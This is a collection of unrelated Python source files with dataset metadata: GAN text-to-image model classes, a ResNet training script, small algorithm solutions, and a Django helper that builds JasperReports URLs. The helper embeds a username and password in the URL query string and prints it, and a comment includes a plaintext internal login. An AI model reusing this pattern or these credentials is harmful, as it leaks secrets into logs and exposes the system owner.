The word encodings correspond\n    to the last hidden layer features for each word, while the sentence\n    encoding corresponds to the very last hidden layer activation of the\n    last forward pass through the LSTM.\n    '''\n    \n    def __init__(self, args):\n        super(TextEncoder, self).__init__()\n        self.name = \"text_encoder\"\n\n        # Architecture hyperparameters\n        self.vocab_size = args.vocab_size\n        self.embed_size = args.embed_size\n        self.prob = args.dropout_prob\n        self.num_layers = args.num_encoder_layers\n        self.hidden_size = int(args.encoding_size / 2)\n        \n        # Initialize parameters\n        self.encoder = nn.Embedding(self.vocab_size, self.embed_size)\n        self.encoder.weight.data.uniform_(-args.weight_range, args.weight_range)\n        self.dropout = nn.Dropout(self.prob)\n        self.lstm = nn.LSTM(self.embed_size, self.hidden_size, self.num_layers,\n                            batch_first=True, dropout=self.prob, bidirectional=True)\n\n    def forward(self, captions, cap_lens):\n        embedding = self.dropout(self.encoder(captions))\n        embedding = pack_padded_sequence(embedding, cap_lens, batch_first=True)\n\n        word_embedding, hiddens = self.lstm(embedding)\n\n        # Get word embedding in desired ordering (DxT)\n        word_embedding = pad_packed_sequence(word_embedding, batch_first=True)[0]\n        word_embedding = word_embedding.transpose(1, 2)\n\n        # Get the sentence embedding in desired ordering (D)\n        hidden, cell = hiddens\n        hidden = hidden.view(self.num_layers, 2, -1, self.hidden_size)\n        sentence_embedding = hidden[-1].transpose(0, 1).contiguous().view(-1, 2 * self.hidden_size)\n\n        return word_embedding, sentence_embedding\n\nclass ImageEncoder(nn.Module):\n    '''\n    The pretrained Inception-v3 model used to encode images for DAMSM\n    loss computation. \n    '''\n    \n    def __init__(self, args):\n        super(ImageEncoder, self).__init__()\n        self.name = \"image_encoder\"\n        self.encoding_size = args.encoding_size\n        \n        # Load pretrained Inception-v3 model from torchvision\n        model = models.inception_v3()\n        url = 'https://download.pytorch.org/models/inception_v3_google-1a9a5a14.pth'\n        model.load_state_dict(model_zoo.load_url(url))\n        for param in model.parameters():\n            param.requires_grad = False\n\n        # Initialize model parameters\n        self.Conv2d_1a_3x3 = model.Conv2d_1a_3x3\n        self.Conv2d_2a_3x3 = model.Conv2d_2a_3x3\n        self.Conv2d_2b_3x3 = model.Conv2d_2b_3x3\n        self.Conv2d_3b_1x1 = model.Conv2d_3b_1x1\n        self.Conv2d_4a_3x3 = model.Conv2d_4a_3x3\n        self.Mixed_5b = model.Mixed_5b\n        self.Mixed_5c = model.Mixed_5c\n        self.Mixed_5d = model.Mixed_5d\n        self.Mixed_6a = model.Mixed_6a\n        self.Mixed_6b = model.Mixed_6b\n        self.Mixed_6c = model.Mixed_6c\n        self.Mixed_6d = model.Mixed_6d\n        self.Mixed_6e = model.Mixed_6e\n        self.Mixed_7a = model.Mixed_7a\n        self.Mixed_7b = model.Mixed_7b\n        self.Mixed_7c = model.Mixed_7c\n\n        self.conv_embed = conv1x1(768, self.encoding_size)\n        self.conv_embed.weight.data.uniform_(-args.weight_range, args.weight_range)\n        self.linear_embed = nn.Linear(2048, self.encoding_size)\n        self.linear_embed.weight.data.uniform_(-args.weight_range, args.weight_range)\n    \n    def forward(self, x):\n        # Extract Inception-v3 features\n        x = nn.Upsample(size=(299, 299), mode='bilinear', align_corners=True)(x)\n        x = self.Conv2d_1a_3x3(x)\n        x = self.Conv2d_2a_3x3(x)\n        x = self.Conv2d_2b_3x3(x)\n        x = F.max_pool2d(x, kernel_size=3, stride=2)\n        x = self.Conv2d_3b_1x1(x)\n        x = self.Conv2d_4a_3x3(x)\n        x = F.max_pool2d(x, kernel_size=3, stride=2)\n        x = self.Mixed_5b(x)\n        x = self.Mixed_5c(x)\n        x = self.Mixed_5d(x)\n        x = self.Mixed_6a(x)\n        x = self.Mixed_6b(x)\n        x = self.Mixed_6c(x)\n        x = self.Mixed_6d(x)\n        x = 
self.Mixed_6e(x)\n\n local_features = x\n\n x = self.Mixed_7a(x)\n x = self.Mixed_7b(x)\n x = self.Mixed_7c(x)\n x = F.avg_pool2d(x, kernel_size=8)\n\n pool_features = x.view(-1, 2048)\n\n # Project features onto encoding space\n pool_features = self.linear_embed(pool_features)\n local_features = self.conv_embed(local_features).view(-1, self.encoding_size, 289)\n \n return local_features, pool_features\n\n# Networks for image generation\n\nclass ConditionalAugmentationNet(nn.Module):\n '''\n Conditional Augmentation net to sample additional examples from\n nearby the sentence encoding, done in order to overcome the sparsity\n of examples. Acts and is trained similar to a VAE.\n '''\n \n def __init__(self, encoding_size, ca_size):\n super(ConditionalAugmentationNet, self).__init__()\n \n self.encoding_size = encoding_size\n self.ca_size = ca_size\n \n self.fc = nn.Linear(self.encoding_size, self.ca_size * 4, bias=True)\n self.glu = GLU()\n\n def encode(self, sentence_embedding):\n x = self.glu(self.fc(sentence_embedding))\n mu = x[:, : self.ca_size]\n logvar = x[:, self.ca_size:]\n return mu, logvar\n\n def reparameterize(self, mu, logvar):\n epsilon = torch.randn_like(mu)\n std = torch.exp(0.5 * logvar)\n return mu + std * epsilon\n\n def forward(self, sentence_embedding):\n mu, logvar = self.encode(sentence_embedding)\n ca_encoding = self.reparameterize(mu, logvar)\n return ca_encoding, mu, logvar\n\nclass F_0(nn.Module):\n '''\n Neural network module used to produce the first coarse grained\n feature map.\n '''\n \n def __init__(self, in_channels, z_size, ca_size):\n super(F_0, self).__init__()\n\n self.in_channels = in_channels\n self.input_dim = z_size + ca_size\n\n # Initialize parameters\n self.fc = nn.Sequential(\n nn.Linear(self.input_dim, self.in_channels * 16 * 2),\n nn.BatchNorm1d(self.in_channels * 16 * 2),\n GLU())\n\n # Four upsampling layers\n upsample_blocks = []\n for i in range(4):\n curr = int(self.in_channels / (2 ** i))\n block = upBlock(curr, int(curr / 2))\n upsample_blocks.append(block)\n self.upsample_block = nn.Sequential(*upsample_blocks)\n\n def forward(self, z_noise, ca_encoding):\n # Concatenate the noise and ca_encoding\n encoding = torch.cat((ca_encoding, z_noise), 1)\n\n output = self.fc(encoding)\n output = output.view(-1, self.in_channels, 4, 4)\n return self.upsample_block(output)\n\nclass F_i(nn.Module):\n '''\n The feature extractors for the deeper layers of the generator network\n complex.\n '''\n \n def __init__(self, in_channels, width):\n super(F_i, self).__init__()\n\n # Architecture hyperparameters\n # Corresponds to D_hat in the AttnGAN paper\n self.in_channels = in_channels\n # 64 or 128\n self.width = width\n\n # Initialize parameters\n self.net = nn.Sequential(\n ResidualBlock(self.in_channels * 2),\n ResidualBlock(self.in_channels * 2),\n upBlock(self.in_channels * 2, self.in_channels))\n\n def forward(self, prev_hidden, word_contexts):\n joined_input = torch.cat((prev_hidden, word_contexts), 1)\n joined_input = joined_input.view(-1, self.in_channels * 2, \n self.width, self.width)\n return self.net(joined_input)\n\nclass F_Attn(nn.Module):\n '''\n Neural network used to compute the attention weights for each\n spatial location of an image.\n '''\n \n def __init__(self, hidden_size, encoding_size):\n super(F_Attn, self).__init__()\n\n # Architecture hyperparameters\n self.encoding_size = encoding_size\n self.hidden_size = hidden_size\n\n self.conv_projection = conv1x1(encoding_size, hidden_size)\n\n def apply_mask(self, s, mask):\n '''\n 
Applies a mask to words with index 0 (either\n start, end or unk. Check it.)\n '''\n bsz, N, T = s.shape\n mask = mask.repeat(N, 1).view(bsz, N, T)\n s.masked_fill_(mask, -float('inf'))\n\n def forward(self, prev_hidden, word_embedding, mask=None):\n '''\n Computes the attention context for each spatial location.\n We are assuming that both prev_hidden and word_embedding are\n flattened matrices.\n '''\n N = prev_hidden.shape[0]\n\n # We first project the word embedding vector to the hidden space\n word_embedding = self.conv_projection(word_embedding.unsqueeze(-1))\n word_embedding = word_embedding.view(N, self.hidden_size, -1)\n\n # Compute beta\n s = torch.bmm(prev_hidden.transpose(1, 2), word_embedding)\n if mask is not None:\n self.apply_mask(s, mask)\n beta = F.softmax(s, dim=2)\n beta = beta.transpose(1, 2)\n\n # Compute the context vector\n word_contexts = torch.bmm(word_embedding, beta)\n\n return word_contexts, beta\n\nclass Generator(nn.Module):\n '''\n Individual generator existing within the generator complex\n of AttnGAN and MirrorGAN producing images of varied coarseness.\n Simply applies a dimension preserving convolutional layer to the image.\n '''\n \n def __init__(self, in_channels, width):\n super(Generator, self).__init__()\n\n self.in_channels = in_channels\n self.width = width\n self.conv = conv3x3(self.in_channels, 3)\n\n def forward(self, prev_hidden):\n prev_hidden = prev_hidden.view(-1, self.in_channels, self.width,\n self.width)\n return torch.tanh(self.conv(prev_hidden))\n\nclass GeneratorComplex(nn.Module):\n '''\n The main generator network of AttnGAN and MirrorGAN (GLAM).\n '''\n \n def __init__(self, args):\n super(GeneratorComplex, self).__init__()\n self.name = \"generator_complex\"\n\n # Architecture hyperparameters\n self.encoding_size = args.encoding_size\n self.ca_size = args.ca_size\n self.in_channels = args.in_channels\n self.z_size = args.z_size\n\n # Model parameters\n # First feature extraction\n self.ca_network = ConditionalAugmentationNet(self.encoding_size, \n self.ca_size)\n self.f_0 = F_0(self.in_channels * 16, self.z_size, self.ca_size)\n self.g_1 = Generator(self.in_channels, 64)\n\n # Second feature extractor\n self.f_1_attn = F_Attn(self.in_channels, self.encoding_size)\n self.f_1 = F_i(self.in_channels, 64)\n self.g_2 = Generator(self.in_channels, 128)\n\n # Third feature extractor\n self.f_2_attn = F_Attn(self.in_channels, self.encoding_size)\n self.f_2 = F_i(self.in_channels, 128)\n self.g_3 = Generator(self.in_channels, 256)\n\n def forward(self, noise, sentence_embedding, word_embedding, mask):\n fake_images = []\n attn_masks = []\n bsz = sentence_embedding.shape[0]\n\n # Go through the first feature extractor\n ca_encoding, mu, logvar = self.ca_network(sentence_embedding)\n h_1 = self.f_0(noise, ca_encoding)\n h_1 = h_1.view(bsz, self.in_channels, -1)\n fake_images.append(self.g_1(h_1))\n\n # Go through second feature extractor\n word_context, beta = self.f_1_attn(h_1, word_embedding, mask=mask)\n h_2 = self.f_1(h_1, word_context)\n h_2 = h_2.view(bsz, self.in_channels, -1)\n fake_images.append(self.g_2(h_2))\n attn_masks.append(beta)\n\n # Go through the third feature extractor \n word_context, beta = self.f_2_attn(h_2, word_embedding, mask=mask)\n h_3 = self.f_2(h_2, word_context)\n h_3 = h_3.view(bsz, self.in_channels, -1)\n fake_images.append(self.g_3(h_3))\n attn_masks.append(beta)\n\n return fake_images, attn_masks, mu, logvar\n\nclass Discriminator(nn.Module):\n '''\n The discriminator architecture\n '''\n\n def 
__init__(self, args, discriminator_number):\n super(Discriminator, self).__init__()\n self.name = \"discriminator_{}\".format(discriminator_number)\n\n self.num_filters = args.discriminator_filters\n self.encoding_size = args.encoding_size\n\n # Get the downscaling layer common to all levels of coarseness\n downscale_chain = [leakyReLUBlock(self.num_filters * (2 ** i), 2 * self.num_filters * (2 ** i),\n 4, 2, 1, bias=True) for i in range(3)]\n common = nn.Sequential(\n nn.Conv2d(3, self.num_filters, 4, 2, 1, bias=True),\n nn.LeakyReLU(0.2, inplace=True),\n *downscale_chain)\n \n # Add additional downsampling layers\n if discriminator_number > 0:\n additional_downscales = [leakyReLUBlock(self.num_filters * (2 ** i), 2 * self.num_filters * (2 ** i),\n 4, 2, 1, bias=True) for i in range(3, 3 + discriminator_number)]\n preserving_convs = [leakyReLUBlock(2 * self.num_filters * (2 ** i), self.num_filters * (2 ** i))\n for i in range(2 + discriminator_number, 2, -1)]\n common = nn.Sequential(\n common,\n *additional_downscales,\n *preserving_convs)\n\n self.downsample = common\n \n # Conditional and unconditional layers\n self.conditional = nn.Sequential(\n leakyReLUBlock(self.num_filters * 8 + self.encoding_size, \n self.num_filters * 8),\n nn.Conv2d(self.num_filters * 8, 1, 4, stride=4, bias=True))\n self.unconditional = nn.Conv2d(self.num_filters * 8, 1, 4, stride=4, bias=True)\n\n def forward(self, x, sentence_encoding):\n h = self.downsample(x)\n\n # Get unconditional logits\n unconditional_logit = self.unconditional(h).view(-1)\n\n # Get conditional logits\n sentence_encoding = sentence_encoding.view(-1, self.encoding_size, 1, 1)\n sentence_encoding = sentence_encoding.repeat(1, 1, 4, 4)\n conditional_logit = self.conditional(torch.cat((h, sentence_encoding), 1)).view(-1)\n\n return unconditional_logit, conditional_logit\n\n# Image Captioning modules for MirrorGAN\n# Has been closely adapted from the original repository\n\nclass ImageCaptioningImageEncoder(nn.Module):\n '''\n A ResNet pretrained on ImageNet used to extract feature vectors \n for image captioning.\n '''\n \n def __init__(self, args):\n super(ImageCaptioningImageEncoder, self).__init__()\n self.name = \"image_captioning_image_encoder\"\n\n self.embedding_size = args.caption_embedding_size\n\n # Load a pretrained resnet from torchvision\n resnet = models.resnet152(pretrained=True) \n self.resnet = nn.Sequential(*(list(resnet.children())[:-1]))\n for param in self.resnet.parameters():\n param.requires_grad = False\n self.projection = nn.Sequential(\n nn.Linear(resnet.fc.in_features, self.embedding_size),\n nn.BatchNorm1d(self.embedding_size, momentum=0.01))\n\n def forward(self, x):\n N = x.shape[0]\n x = nn.Upsample(size=(224, 224), mode='bilinear', align_corners=True)(x)\n x = self.resnet(x).view(N, -1)\n return self.projection(x)\n\nclass ImageCaptioningLSTM(nn.Module):\n '''\n The LSTM used to caption images\n '''\n def __init__(self, args):\n super(ImageCaptioningLSTM, self).__init__()\n self.name = \"image_captioning_lstm\"\n\n # Architecture hyperparameters\n self.vocab_size = args.vocab_size\n self.embedding_size = args.caption_embedding_size\n self.hidden_size = args.caption_hidden_size\n self.num_layers = args.caption_num_layers\n self.seq_len = constants.SEQ_LENGTH\n\n # Parameter initialization\n self.embed = nn.Embedding(self.vocab_size, self.embedding_size)\n self.lstm = nn.LSTM(self.embedding_size, self.hidden_size, self.num_layers,\n batch_first=True)\n self.fc = nn.Linear(self.hidden_size, self.vocab_size)\n\n 
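# Note: forward() below trains with teacher forcing -- the image embedding is\n    # fed as step 0 and the ground-truth caption tokens as the remaining steps --\n    # while sample() decodes greedily, feeding each argmax token back in.\n\n    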
def forward(self, image_embedding, captions, cap_lens):\n        embedding = self.embed(captions)\n        embedding = torch.cat((image_embedding.unsqueeze(1), embedding), 1)\n        packed = pack_padded_sequence(embedding, cap_lens, batch_first=True)\n        hiddens, _ = self.lstm(packed)\n        outputs = self.fc(hiddens[0])\n        return outputs\n\n    def sample(self, embedding, states=None): \n        samples = []\n        input_embedding = embedding.unsqueeze(1)\n        for i in range(self.seq_len):\n            output, states = self.lstm(input_embedding, states)  # carry the LSTM state forward between steps\n            output = self.fc(output.squeeze(1))\n            _, next_inputs = torch.max(output, 1)\n            samples.append(next_inputs)\n            input_embedding = self.embed(next_inputs)\n            input_embedding = input_embedding.unsqueeze(1)\n        return torch.stack(samples, 1)\n\n# For Inception scores\n\nclass InceptionNetwork(nn.Module):\n    '''\n    Inception-v3 model to be finetuned on CUB and used for inception\n    score calculation. Implementation done with reference to\n    https://pytorch.org/tutorials/beginner/finetuning_torchvision_models_tutorial.html\n    '''\n\n    def __init__(self):\n        super(InceptionNetwork, self).__init__()\n        self.name = \"inception_network\"\n        \n        # Load pretrained Inception-v3\n        model = models.inception_v3(pretrained=True)\n        for param in model.parameters():\n            param.requires_grad = False\n\n        # Initialize finetuning layers\n        in_features = model.AuxLogits.fc.in_features\n        model.AuxLogits.fc = nn.Linear(in_features, 200)\n        in_features = model.fc.in_features\n        model.fc = nn.Linear(in_features, 200)\n\n        self.model = model\n\n    def forward(self, x):\n        x = nn.Upsample(size=(299, 299), mode='bilinear', align_corners=True)(x)\n        return self.model(x)\n\nclass PretrainedInception(nn.Module):\n    '''\n    Frozen ImageNet-pretrained Inception-v3 used without finetuning for\n    inception score calculation. Implementation done with reference to\n    https://pytorch.org/tutorials/beginner/finetuning_torchvision_models_tutorial.html\n    '''\n\n    def __init__(self):\n        super(PretrainedInception, self).__init__()\n        self.name = \"inception_network\"\n        \n        # Load pretrained Inception-v3\n        model = models.inception_v3(pretrained=True)\n        for param in model.parameters():\n            param.requires_grad = False\n        self.model = model\n\n    def forward(self, x):\n        x = nn.Upsample(size=(299, 299), mode='bilinear', align_corners=True)(x)\n        return self.model(x)\n
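\n# Usage sketch (illustrative; the input size is arbitrary -- images are\n# upsampled to 299x299 internally):\n#   net = PretrainedInception().eval()\n#   logits = net(torch.randn(4, 3, 64, 64))  # -> (4, 1000) ImageNet logits\n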
","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":30032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"308434830","text":"# -*- coding: utf-8 -*-\n\nfrom datetime import date\n\nfrom django.conf import settings\n\n\n# http://192.168.0.10:8080/jasperserver/flow.html?_flowId=viewReportFlow&standAlone=true&reportUnit=/Imobiliar/Relatorios/Balancete_Por_Periodo&datafin=2016-01-31&dataini=2016-01-01&j_username=alugar&j_password=consulta&decorate=no\n\ndef montaURLjasperReport(report_name, params=None):\n    \"\"\"\n    params:`dict`, ex: {'dataini':`datetime.datetime`(2016,5,1),'datafin':`datetime.datetime`(2016,5,31)}\n    \"\"\"\n    if params is None:\n        params = {}\n    url_string = settings.REPORT_URI + '/flow.html?_flowId=viewReportFlow&standAlone=true&reportUnit=' + report_name\n\n    paramstr = ''\n    if type(params) == dict:\n        for k, v in params.items():\n            if isinstance(v, date):\n                params[k] = v.strftime(\"%Y-%m-%d\")\n            else:\n                params[k] = v\n            p = '{0}={1}&'.format(k, v)\n            paramstr += p\n    else:\n        raise TypeError(\"Params is not Dict Type\")\n\n    login = 'j_username={0}&j_password={1}&decorate=no'.format(settings.REPORT_USERNAME, settings.REPORT_PASSWORD)\n\n    url = '{0}&{1}{2}'.format(url_string, paramstr, login)\n    print('URL: ' + url)\n\n    return url\n","sub_path":"common/reports.py","file_name":"reports.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"607452090","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\nimport mnist_loader\r\nimport network2\r\n\r\nif __name__ == \"__main__\":\r\n    # Load the MNIST data first.\r\n    training_data, validation_data, test_data = mnist_loader.load_data_wrapper()\r\n\r\n    net = network2.Network([784, 30, 10], cost = network2.CrossEntropyCost)\r\n    net.large_weight_initializer()\r\n\r\n    net.SGD(training_data, 30, 10, 0.5, evaluation_data=test_data, monitor_evaluation_accuracy=True)\r\n\r\n","sub_path":"src/run2.py","file_name":"run2.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"495275412","text":"n = int(input())\ninnings = [list(map(int, input().split())) for _ in range(n)]\n# Don't call remove inside a loop..! The list shrinks while the index keeps advancing, so you get an out-of-range error\nfrom itertools import permutations\ndef score(ord): # takes a batting order, plays it out, and returns the total score\n    '''\n    Use a while loop, cycling through the players with modulo arithmetic until three outs occur.\n    The while loop handles one batter per pass; whenever an out happens, increment out.\n    Repeat that while loop for every inning, accumulating the score inning by inning.\n    '''\n    s = 0\n    idx = 0 # idx: index of the batter at the plate; the first inning starts with batter 0\n    for perform in innings:\n        # each player's performance for this inning\n        out = 0 # reset the out count\n        b1, b2, b3 = 0, 0, 0\n        while True: # break once there are three outs\n            idx = idx % 9\n            player = ord[idx]\n            if perform[player] == 0:\n                out += 1\n            elif perform[player] == 1:\n                s += b3\n                b1, b2, b3 = 1, b1, b2\n            elif perform[player] == 2:\n                s += (b2 + b3)\n                b1, b2, b3 = 0, 1, b1\n            elif perform[player] == 3:\n                s += (b1 + b2 + b3)\n                b1, b2, b3 = 0, 0, 1\n            elif perform[player] == 4:\n                s += (b1 + b2 + b3 + 1)\n                b1, b2, b3 = 0, 0, 0\n            idx += 1\n            if out == 3:\n                break\n    return s\nanswer = 0\nfor order in permutations(range(1, 9), 8):\n    order = order[0:3] + (0,) + order[3:]\n    answer = max(score(order), answer)\n\nprint(answer)","sub_path":"BeakjoonOJ_Solved/17281.py","file_name":"17281.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"542020218","text":"def solution(X, A):\n    data = {}\n\n    for i, x in enumerate(A):\n        if x not in data:\n            data[x] = i\n\n    res = 0\n    for i in range(1, X + 1):\n        if i not in data:\n            return -1\n        res = max(data[i], res)\n\n    return res\n","sub_path":"cdlt/FrogRiverOne.py","file_name":"FrogRiverOne.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"558075448","text":"# python3 main script\n\"\"\"\nGeneral usage: \nOn linux: CUDA_VISIBLE_DEVICES=4 python3 train.py --i_fold 1\n\"\"\"\n\n# basic libraries\nfrom __future__ import print_function\nimport argparse\nimport numpy as np\nimport pandas as pd\nimport os\nimport time\n\n#import tensorflow as tf\n#from keras.backend.tensorflow_backend import set_session\n#config = tf.ConfigProto()\n#config.gpu_options.per_process_gpu_memory_fraction = 0.8\n#set_session(tf.Session(config = config))\n\n### add argument parsing ###\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--i_fold\", type = str, help = \"fold number to append on model name\", default = '1')\nparser.add_argument(\"--n_gen_loop\", type = int, help = \"Validation set augment ratio (loop)\", default = 3)\n\nargs = 
parser.parse_args()\ni_fold = args.i_fold\n\n# NN libraries\nimport keras\nfrom keras.models import Sequential, Model\nfrom keras.models import load_model, save_model\nfrom keras.optimizers import SGD, Adam, Adagrad # gradient optimizers\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau\nfrom keras import backend as K\nK.set_image_dim_ordering('tf')\n\n# customized functions (should be under the same path)\nfrom callbacks_miscs import *\nfrom py_init_data import *\nfrom py_generator_for_model import *\n\n# there should be a config.py under the same path\nfrom config import *\nprint('Config import complete')\n\nif nn_activation == 'relu':\n    ### If using the default resnet\n    from keras.applications.resnet50 import ResNet50\nelse:\n    ### If you want to modify the resnet structure\n    from resnet_with_drp import *\n\nfrom keras.models import Sequential, Model, load_model, save_model\nfrom keras.layers import Dense, Dropout, Activation, Flatten, Input\nfrom keras.layers import Convolution2D, MaxPooling2D, Conv2D, BatchNormalization\nfrom keras.layers import AveragePooling2D, ZeroPadding2D, GlobalAveragePooling2D\n\ndef resnet_model_build(resnet_model, use_stage, freeze_stage, acti,\n                       use_merge = False, \n                       n_meta = 0,\n                       fc_drop_rate = 0.2):\n    # if use_merge is enabled, always check n_meta\n    \n    fc_drop_rate = float(fc_drop_rate)\n    for layer in resnet_model.layers:\n        layer.trainable = True\n    #resnet_model.summary()\n\n    # different activation functions change the layer names, so pick the matching prefix\n    if acti == 'relu':\n        to_get = 'activation_'\n    else:\n        to_get = acti + \"_\"\n\n    if use_stage == 1:\n        get_layer = \"max_pooling2d\"\n    elif use_stage == 2:\n        #get_layer = \"activation_10\"\n        get_layer = to_get + '10'\n    elif use_stage == 3:\n        #get_layer = \"activation_22\"\n        get_layer = to_get + '22'\n    elif use_stage == 4:\n        #get_layer = \"activation_40\"\n        get_layer = to_get + '40'\n    else:\n        get_layer = \"global_avg_pooling2d_1\"\n\n    if freeze_stage == 1:\n        free_layer_num = 5\n    elif freeze_stage == 2:\n        free_layer_num = 37\n    elif freeze_stage == 3:\n        free_layer_num = 79\n    elif freeze_stage == 4:\n        free_layer_num = 141\n    else:\n        free_layer_num = 176\n\n    if freeze_stage == 0:\n        print('all parameters tunable')\n    else:\n        for layer in resnet_model.layers[:free_layer_num]:\n            layer.trainable = False\n    \n    if use_stage != 5: \n        x = resnet_model.get_layer(get_layer).output\n        #x = AveragePooling2D((13, 13), name='avg_pool')(x)\n        #x = Flatten()(x)\n        x = GlobalAveragePooling2D()(x)\n    else:\n        x = resnet_model.get_layer(get_layer).output\n    \n    if use_merge:\n        meta_info = Input(shape = (n_meta, )) # n_meta: number of meta features\n        x = keras.layers.concatenate([x, meta_info])\n    else:\n        pass\n    \n    \"\"\"\n    x = Dense(64, name = 'dense1')(x)\n    x = BatchNormalization(axis = -1, name = 'dense1_bn')(x)\n    x = Activation('relu', name = 'dense1_activation')(x)\n    x = Dropout(fc_drop_rate, name = 'd1_drop')(x)\n    \n    x = Dense(32, name = 'dense2')(x)\n    x = BatchNormalization(axis = -1, name = 'dense2_bn')(x)\n    x = Activation('relu', name = 'dense2_activation')(x)\n    x = Dropout(fc_drop_rate, name = 'd2_drop')(x)\n    \"\"\"\n    \n    out = Dense(2, activation=\"softmax\", name = \"output\")(x)\n    \n    model_final = Model(inputs = [resnet_model.input], outputs = [out])\n    return model_final\n\n\n\"\"\"\nTrain all data, cut by date\n\"\"\"\nprint('script start')\n# Define names for saved model name\nopt = model_output_prefix + '_k' + str(i_fold)\nmodel_file_name = dir_out_model + \"/model_\" + opt + \".h5\"\n\n
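# Usage sketch (illustrative; mirrors the call further below, where fs/us/nn_activation come from config.py):\n# base = ResNet50(include_top=False, weights=\"imagenet\", input_shape=(200, 200, 3), pooling='avg')\n# model = resnet_model_build(base, use_stage=us, freeze_stage=fs, acti=nn_activation)\n\n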
# Initialize the data\ndata_cla = init_data_from_directory(data_params)\ntrain_nonC, val_nonC, test_nonC, train_C, val_C, test_C = data_cla.get_train_val_test_df()\nprint('Non_copper training/validation/testing ' + str(len(train_nonC)) + \"/\" + str(len(val_nonC)) + \"/\" + str(len(test_nonC)))\nprint('copper training/validation/testing ' + str(len(train_C)) + \"/\" + str(len(val_C)) + \"/\" + str(len(test_C)))\n\n# Check table independence here (the intersections should be empty; if not, it means data contamination)\nif len(set(train_C.pid).intersection(test_C.pid) ) != 0:\n    print('die')\n    raise RuntimeError('YOU MUST ERROR HERE!')\nif len(set(train_nonC.pid).intersection(test_nonC.pid) ) != 0:\n    print('die')\n    raise RuntimeError('YOU MUST ERROR HERE!')\n    \n# Get training set mean of rgb\nif generator_params_dict['use_self_improc'] == 'dataset':\n    print('use dataset mean')\n    avg_dataset = get_training_set_mean(df_class0= train_C, df_class1= train_nonC, n_core=8)\n    generator_params_dict['dataset_mean'] = avg_dataset / np.float32(dataset_mean_ratio)\n    # write the self_mean information to a txt file\n    csv_file_name = dir_out_model + \"/rgbConfig_\" + opt + \".txt\"\n    np.savetxt(csv_file_name, avg_dataset)\nelse:\n    generator_params_dict['dataset_mean'] = None\n    print('do not use dataset mean')\n\n# Initialize the generator\ngen_data = call_generators(generator_params_dict, dta_gen= datagen)\nx_val, y_val = gen_data.get_validation_data(df_class0= val_nonC, df_class1= val_C,\n                                            class_0_ratio = 1, use_im_gen = datagen_val, n_gen_loop = args.n_gen_loop)\nK.clear_session()\nif nn_activation == 'relu':\n    print('use default activation function')\n    resnet_model = ResNet50(include_top=False, weights = \"imagenet\", input_shape = (200, 200, 3), pooling ='avg')\nelse:\n    print('use activation function: ' + nn_activation)\n    resnet_model = ResNet50(include_top=False, weights = \"imagenet\", input_shape = (200, 200, 3), pooling ='avg', acti = nn_activation)\n\nmodel = resnet_model_build(resnet_model, freeze_stage= fs, use_stage= us, acti = nn_activation)\nif n_gpu_use > 1:\n    print('use ' + str(n_gpu_use) + ' GPUs for merging')\n    model = make_parallel(model, n_gpu_use)\n\nmodel.summary()\n\nreduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.5, patience=6)\nmyoptimizer = Adam(lr= lr)\nmodel.compile(loss='binary_crossentropy', optimizer=myoptimizer, metrics=['acc'])\n\nearlystop = EarlyStopping(monitor= 'val_loss', \n                          min_delta= 0.0001, \n                          patience= nb_epoch / 10, \n                          verbose=0, mode='auto')\n\ncheckpoint = ModelCheckpoint(model_file_name,\n                             monitor='val_loss',\n                             verbose=1,\n                             save_best_only=True,\n                             mode='auto')\nloss_history = LossHistory()\nif use_merge:\n    pass\nelse:\n    history_model = model.fit_generator(gen_data.train_generator(df_class0=train_nonC, \n                                                                  df_class1=train_C,\n                                                                  class_0_ratio = 1,\n                                                                  class_1_ratio = 1,\n                                                                  bz = batch_size, action = mini_batch_method),\n                                        steps_per_epoch = n_batch,\n                                        epochs= nb_epoch,\n                                        validation_data=(x_val, y_val),\n                                        callbacks = [\n                                            reduce_lr,\n                                            loss_history, \n                                            checkpoint, \n                                            earlystop,\n                                            LogAUC(), \n                                            f1sc()\n                                            \n                                        ])\n\n    # save training process\ntrain_loss = history_model.history.get(\"loss\")\ntrain_acc = history_model.history.get(\"acc\")\nval_loss = history_model.history.get(\"val_loss\")\nval_acc = history_model.history.get(\"val_acc\")\nval_auc = history_model.history.get(\"val_auc\")\nval_f1 = history_model.history.get('val_f1sc')\nval_tp = np.array(history_model.history.get('val_tp')).astype('float32')\nval_tn = np.array(history_model.history.get('val_tn')).astype('float32')\nval_fp = 
np.array(history_model.history.get('val_fp')).astype('float32')\nval_fn = np.array(history_model.history.get('val_fn')).astype('float32')\n \npd_tmp = pd.DataFrame({'train_loss': train_loss,\n 'valid_loss': val_loss,\n 'train_acc': train_acc,\n 'valid_acc': val_acc,\n 'valid_f1': val_f1,\n 'valid_auc': val_auc,\n 'valid_TP': val_tp,\n 'valid_TN': val_tn,\n 'valid_FP': val_fp,\n 'valid_FN': val_fn})\npd_tmp.to_csv(opt + '_training_process.csv')\n# make prediction\npred_out = gen_data.model_predict_testing(model_name = model_file_name, \n df_class0 = test_nonC, \n df_class1 = test_C, \n testing_batch_size= 10000)\npred_out.to_csv(dir_out_csv + '/testing_' + opt + '.csv', index = False)\nprint('a round end')\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"211622280","text":"# This is actually the development one.\n# lutherrideshare.appspot key: ABQIAAAAg9WbCE_zwMIRW7jDFE_3ixS0LiYWImofzW4gd3oCqtkHKt0IaBT-STdq-gdH-mW2_ejMPXqxnfJjgw\n\n# This has the app id of ridesharebeta and is also on ridesharebeta.appspot.com\n# rideshare.luther.edu key: 